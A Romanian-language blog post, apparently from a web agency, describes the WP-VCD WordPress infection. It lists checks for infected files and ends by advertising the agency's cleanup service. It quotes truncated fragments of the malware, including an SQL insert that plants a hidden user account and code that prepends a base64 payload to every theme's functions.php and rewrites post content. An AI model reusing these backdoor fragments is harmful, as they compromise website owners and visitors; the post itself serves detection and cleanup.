Malicious code injection inside a wordpress theme’s functions.php and wp-includes editing posts content.
Tu știi dacă ai site-ul virusat?
Întâmplător am descoperit câteva linii de cod care nu aveau ce căuta acolo într-un site create în wordpress. Credeam că dacă folosesc plugin-uri descărcate direct de pe site-ul wordpress sunt ferit de astfel de suprize neplăcute.
Am verificat să vedem ce sunt și ce fac acele linii de cod. Rezultatul nu este deloc unul bun. Așadar, am căut o rezolvare pe internet. Rezultatul a fost multe topicuri și nicio rezolvare concretă. Așadar, mi-am facut un script care identifică și șterge elementele virusate.
Verificare web daca site-ul este infectat
Pasul 1 – Se verifica direct in link-ul site-ului:
- http://site/wp-includes/class.wp.php
- http://site/wp-includes/wp-tmp.php
- http://site/wp-includes/wp-vcd.php
Dacă
- se încarcă o pagină goala, atunci site-ul este infectat
- se încarcă o pagină 404, atunci site-ul nu este infectat
Pasul 3 – Se verifică direct pe HDD dacă exista aceste fișiere si dacă conține codul suspect.
Cum ne dăm seama dacă site-ul este într-adevăr infectat?
Se verifică dacă există fișierele și cod suspect:
- /wp-includes/class.wp.php
$wpdb->query(„INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (‘100010010’, ‘100010010’, ‘\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.’, ‘100010010’, ‘te@ea.st‘, ”, ‘2011-06-07 00:00:00’, ”, ‘0’, ‘100010010’);”);
- /wp-includes/wp-tmp.php
- cod prezent la începutul fișierului /wp-includes/wp-vcd.php
$install_code = ‘PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pIC[…]
$install_hash = md5($_SERVER[‘HTTP_HOST’] . AUTH_SALT);
$install_code = str_replace(‘{$PASSWORD}’ , $install_hash, base64_decode( $install_code ));
- cod prezent la inceputul fisierului /wp-includes/post.php
- cod prezent in fisierul functions.php din fiecare tema in site.
if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’)){
if (strpos($content, ‘WP_V_CD’) === false){
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’, $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’ , $time );
}
else { $ping = false; }
}
foreach ($wpdb->get_results(‘SELECT * FROM `’ . $wpdb->prefix . ‘posts` WHERE `post_status` = „publish” AND `post_type` = „post” ORDER BY `ID` DESC’, ARRAY_A) as $data)
[…]
$post_content = preg_replace(‘!<div id=”‘.$div_code_name.'”>(.*?)</div>!s’, ”, $data -> post_content);
[…]
$file = preg_replace(‘/’.$matcholddiv[1][0].’/i’,$_REQUEST[‘newdiv’], $file);
[…]
$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
if ($wpdb -> query(‘INSERT INTO `’ . $wpdb->prefix . ‘datalist` SET `url` = „/’.mysql_escape_string($_REQUEST[‘url’]).'”, `title` = „‘.mysql_escape_string($_REQUEST[‘title’]).'”, `keywords` = „‘.mysql_escape_string($_REQUEST[‘keywords’]).'”, `description` = „‘.mysql_escape_string($_REQUEST[‘description’]).'”, `content` = „‘.mysql_escape_string($_REQUEST[‘content’]).'”, `full_content` = „‘.mysql_escape_string($_REQUEST[‘full_content’]).'” ON DUPLICATE KEY UPDATE `title` = „‘.mysql_escape_string($_REQUEST[‘title’]).'”, `keywords` = „‘.mysql_escape_string($_REQUEST[‘keywords’]).'”, `description` = „‘.mysql_escape_string($_REQUEST[‘description’]).'”, `content` = „‘.mysql_escape_string(urldecode($_REQUEST[‘content’])).'”, `full_content` = „‘.mysql_escape_string($_REQUEST[‘full_content’]).'”‘))
Soluție devirusare site
LISAL a dezvoltat un script care analizează dacă există acest cod malițions și îl elimina din toate fișierele site-ului.
Contacteaza-ne la telefon+4 077 05 78 155 sau pe office@lisal.ro dacă ai o suspiciune că site-ul este virusat.
Info malware
- https://exchange.xforce.ibmcloud.com/collection/wp-vcd-Wordpress-Malware-48ec32a4fc42026dafd9545a237d1e5e
0 Comentarii